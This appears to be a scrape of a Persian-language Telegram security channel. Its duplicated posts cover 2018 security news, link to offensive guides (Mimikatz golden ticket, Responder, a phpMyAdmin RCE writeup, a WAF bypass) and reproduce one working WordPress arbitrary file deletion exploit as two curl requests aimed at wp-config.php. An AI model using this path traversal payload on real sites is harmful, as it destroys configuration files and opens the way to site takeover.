بر اساس گزارش شرکت Big Brother Watch که یک شرکت طرفدار حفظ حریم خصوصی و آزادی های مدنی در بریتانیاست، سیستم صوتی درآمد و گمرکات ملکه صداهای بیش از 5.1 میلیون شهروند بریتانیا را بدون اطلاع آنها ضبط کرده است.
این سیستم صوتی که از ژانویه سال قبل راه اندازی شده است برای تشخیص هویت افرادی که با این آژانس تماس میگیرند، استفاده میشود.
این سیستم در حال ایجاد یک دیتابیس تشخیص صدای بیومتریک برای حکومت است.
این کار مخالف بند ۹ قانون GDPR نیز به حساب می آید.
منبع:
https://www.hackread.com/voices-records-of-brits-stored-by-tax-agency/
#news
#britania
#privacy
#england
@sec_nerd
این سیستم صوتی که از ژانویه سال قبل راه اندازی شده است برای تشخیص هویت افرادی که با این آژانس تماس میگیرند، استفاده میشود.
این سیستم در حال ایجاد یک دیتابیس تشخیص صدای بیومتریک برای حکومت است.
این کار مخالف بند ۹ قانون GDPR نیز به حساب می آید.
منبع:
https://www.hackread.com/voices-records-of-brits-stored-by-tax-agency/
#news
#britania
#privacy
#england
@sec_nerd
HackRead
Voice records of millions of Brits stored by tax agency without consent
According to Big Brother Watch, HMRC (Her Majesty's Revenue and Customs) has stored voice records of over 5.1 million British citizens.
مروری بر تیکت طلایی در mimikatz
https://www.beneaththewaves.net/Projects/Mimikatz_20_-_Golden_Ticket_Walkthrough.html
#mimikatz
#windows
#privesc
#golden_ticket
#network
@sec_nerd
https://www.beneaththewaves.net/Projects/Mimikatz_20_-_Golden_Ticket_Walkthrough.html
#mimikatz
#windows
#privesc
#golden_ticket
#network
@sec_nerd
www.beneaththewaves.net
Mimikatz 2.0 - Golden Ticket Walkthrough - Projects - Beneath the Waves
A step-by-step example of using the Kerberos
❌ قابل توجه کاربران سیستم عامل Gentoo❌
روز گذشته حساب گیت هاب سیستم عامل Gentoo توسط هکر یا هکرها مورد حمله قرار گرفت و سورس کد اصلی با سورس کد آلوده جایگزین شد!
این هکرها که ماهیت شان شناخته شده نیست در روز ۲۸ ژوئن موفق به دستیابی به حساب گیت هاب این سیستم عامل شدند.
منبع:
https://thehackernews.com/2018/06/gentoo-linux-github.html
#news
#linux
#github
#gentoo
#malware
@sec_nerd
روز گذشته حساب گیت هاب سیستم عامل Gentoo توسط هکر یا هکرها مورد حمله قرار گرفت و سورس کد اصلی با سورس کد آلوده جایگزین شد!
این هکرها که ماهیت شان شناخته شده نیست در روز ۲۸ ژوئن موفق به دستیابی به حساب گیت هاب این سیستم عامل شدند.
منبع:
https://thehackernews.com/2018/06/gentoo-linux-github.html
#news
#linux
#github
#gentoo
#malware
@sec_nerd
اکسپلویت جدید وردپرس که قابلیت حذف هر فایل دلخواه را به هکرها میدهد!
# Exploit Title: Wordpress <= 4.9.6 Arbitrary File Deletion Vulnerability
# Date: 2018-06-27
# Exploit Author: VulnSpy
# Vendor Homepage: https://www.wordpress.org
# Software Link: https://www.wordpress.org/download
# Version: <= 4.9.6
# Tested on: php7 mysql5
# CVE :
Step 1:
#wordpress
#wp
#exploit
#web
#pentest
@sec_nerd
# Exploit Title: Wordpress <= 4.9.6 Arbitrary File Deletion Vulnerability
# Date: 2018-06-27
# Exploit Author: VulnSpy
# Vendor Homepage: https://www.wordpress.org
# Software Link: https://www.wordpress.org/download
# Version: <= 4.9.6
# Tested on: php7 mysql5
# CVE :
Step 1:
curl -v 'https://localhost/wp-admin/post.php?post=4' -H 'Cookie: ***' -d 'action=editattachment&_wpnonce=***&thumb=../../../../wp-config.php'Step 2:
curl -v 'https://localhost/wp-admin/post.php?post=4' -H 'Cookie: ***' -d 'action=delete&_wpnonce=***'
#wordpress
#wp
#exploit
#web
#pentest
@sec_nerd
WordPress.org
Download
Download WordPress today, and get started on creating your website with one of the most powerful, popular, and customizable platforms in the world.
امنیت اطلاعات
اکسپلویت جدید وردپرس که قابلیت حذف هر فایل دلخواه را به هکرها میدهد! # Exploit Title: Wordpress <= 4.9.6 Arbitrary File Deletion Vulnerability # Date: 2018-06-27 # Exploit Author: VulnSpy # Vendor Homepage: https://www.wordpress.org # Software Link: http:…
This media is not supported in your browser
VIEW IN TELEGRAM
لیست ۵۰۰ سوپر کامپیوتر جهان منتشر شد و رتبه اول قوی ترین سوپر کامپیوتر به IBM Summit از امریکا اختصاص یافت.
در این رده بندی امریکا اول است اما سوپرکامپیوترهای چینی تعداد بیشتری دارند.
پس از سالها، توجه رده بندی ها از CPU به سوی GPU کشیده شده است و در این زمینه NVidia مجالی به رقبای خود برای خودنمایی نداده است.
نکته جالب توجه، استفاده تمامی این سوپرکامپیوترها از سیستم عامل لینوکس است! (همانند سالهای پیش)
منبع:
https://fossbytes.com/top500-most-powerful-supercomputer-list-2018-powered-by-linux/
#AI
#ML
#news
#linux
#gpu
#IBM
#usa
#chinna
@sec_nerd
در این رده بندی امریکا اول است اما سوپرکامپیوترهای چینی تعداد بیشتری دارند.
پس از سالها، توجه رده بندی ها از CPU به سوی GPU کشیده شده است و در این زمینه NVidia مجالی به رقبای خود برای خودنمایی نداده است.
نکته جالب توجه، استفاده تمامی این سوپرکامپیوترها از سیستم عامل لینوکس است! (همانند سالهای پیش)
منبع:
https://fossbytes.com/top500-most-powerful-supercomputer-list-2018-powered-by-linux/
#AI
#ML
#news
#linux
#gpu
#IBM
#usa
#chinna
@sec_nerd
Fossbytes
Linux Powers ALL TOP500 Supercomputers In The World | US Beats China For #1
IBM Summit has tasted another bread of success as the TOP500 List of the world's fastest supercomputers renews for the year 2018. It's not surprising to see Summit ( with its Linpack score of 122.3 petaflops) taking the throne away from Sunway TaihuLight…
امنیت اطلاعات
محققان سیسکو امروز اعلام کردند که یک بات نت بسیار بزرگ کشف کرده اند که از روترهای هک شده تشکیل شده و آماده یک حمله سایبری علیه اوکراین است. این بات نت توسط یک بدافزار که اقدام به آلوده کردن روترهای خانگی میکند، ساخته شده و VPNFilter نام دارد. محققان امنیتی…
This media is not supported in your browser
VIEW IN TELEGRAM
توضیحات Craig Williams مدیر اجرایی تیم امنیتی talos در خصوص نحوه مقابله با بات نت #vpnfilter
#talos
#network
#botnet
@sec_nerd
#talos
#network
#botnet
@sec_nerd
امنیت اطلاعات
آسیب پذیری جدید در phpmyadmin ورژن های خانواده 4.8 این آسیب پذیری نیاز به یوزر معتبر داشته و قادرست LFI را به RCE تبدیل کند https://blog.vulnspy.com/2018/06/21/phpMyAdmin-4-8-x-Authorited-CLI-to-RCE/ #phpmyadmin #exploit #web #lfi #rce @sec_nerd
رایت آپ مربوط به آسیب پذیری RCE در phpmyadmin
https://medium.com/@happyholic1203/phpmyadmin-4-8-0-4-8-1-remote-code-execution-257bcc146f8e
#phpmyadmin
#exploit
#web
#lfi
#rce
#writeup
@sec_nerd
https://medium.com/@happyholic1203/phpmyadmin-4-8-0-4-8-1-remote-code-execution-257bcc146f8e
#phpmyadmin
#exploit
#web
#lfi
#rce
#writeup
@sec_nerd
Medium
PHPMyAdmin 4.8.0 ~ 4.8.1 Remote Code Execution
TL;DR
https://www.notsosecure.com/pwning-with-responder-a-pentesters-guide/
تسخیر شبکه با استفاده از ابزار Responder
#windows
#network
#privesc
#pivoting
#sniff
@sec_nerd
تسخیر شبکه با استفاده از ابزار Responder
#windows
#network
#privesc
#pivoting
#sniff
@sec_nerd
NotSoSecure
Pwning with Responder - A Pentester's Guide
Overview: Responder is a great tool that every pentester needs in their arsenal. If a client/target cannot resolve a name via DNS it will fall back to name resolution via LLMNR (introduced in Windows
Media is too big
VIEW IN TELEGRAM
پس از اعلام شرکت آدیداس مبنی بر هک شدن وبسایت نمایندگی امریکای این شرکت، جزییاتی در خصوص اطلاعات به سرقت رفته منتشر شده است.
این اطلاعات شامل نام های کاربری و مشخصات میلیونها کاربر آدیداس بوده است.
اما آدیداس معتقد است که اطلاعات مربوط به سلامت و حسابهای بانکی مشتریان در این حمله دزدیده نشده، بعلاوه پسوردهای هک شده همگی دارای رمزنگاری مناسب بوده اند که این نشان از آمادگی مناسب آدیداس در برابر حملات این چنینی دارد.
اما آمادگی در برابر حمله هایی در این شکل و شمایل کافی نیست و نیاز به کار مداوم و بروزرسانی های امنیتی دائمی دارد.
هنوز جزییات دقیق تری از سوی آدیداس درخصوص این حمله منتشر نشده است.
منبع:
https://www.hackread.com/hackers-steal-millions-of-customers-data-from-adidas-us-website/
#adidas
#breach
#news
@sec_nerd
این اطلاعات شامل نام های کاربری و مشخصات میلیونها کاربر آدیداس بوده است.
اما آدیداس معتقد است که اطلاعات مربوط به سلامت و حسابهای بانکی مشتریان در این حمله دزدیده نشده، بعلاوه پسوردهای هک شده همگی دارای رمزنگاری مناسب بوده اند که این نشان از آمادگی مناسب آدیداس در برابر حملات این چنینی دارد.
اما آمادگی در برابر حمله هایی در این شکل و شمایل کافی نیست و نیاز به کار مداوم و بروزرسانی های امنیتی دائمی دارد.
هنوز جزییات دقیق تری از سوی آدیداس درخصوص این حمله منتشر نشده است.
منبع:
https://www.hackread.com/hackers-steal-millions-of-customers-data-from-adidas-us-website/
#adidas
#breach
#news
@sec_nerd
Hackread
Hackers steal millions of customers’ data from Adidas US website
Hackers have targeted Adidas US website and stole personal details of millions of customers including contact details.
دور زدن WAF با سوء استفاده از SSL/TLS
https://0x09al.github.io/waf/bypass/ssl/2018/07/02/web-application-firewall-bypass.html
#waf
#pentest
#web
@sec_nerd
https://0x09al.github.io/waf/bypass/ssl/2018/07/02/web-application-firewall-bypass.html
#waf
#pentest
#web
@sec_nerd
usb_fan_report.pdf
251.9 KB
گزارش فنی-امنیتی از فن های usb مورد استفاده در نشست ترامپ و کیم جونگ اون در سنگاپور برای موارد جاسوسی
#spy
#usa
#nk
#enviromental
@sec_nerd
#spy
#usa
#nk
#enviromental
@sec_nerd
لینوکس SUSE که متعلق به یک شرکت بریتانیایی بود با قیمت 2.5 میلیارد دلار به یک شرکت سهامی سوئدی فروخته شد.
https://thehackernews.com/2018/07/suse-linux-acquired.html
#news
#linux
@sec_nerd
https://thehackernews.com/2018/07/suse-linux-acquired.html
#news
#linux
@sec_nerd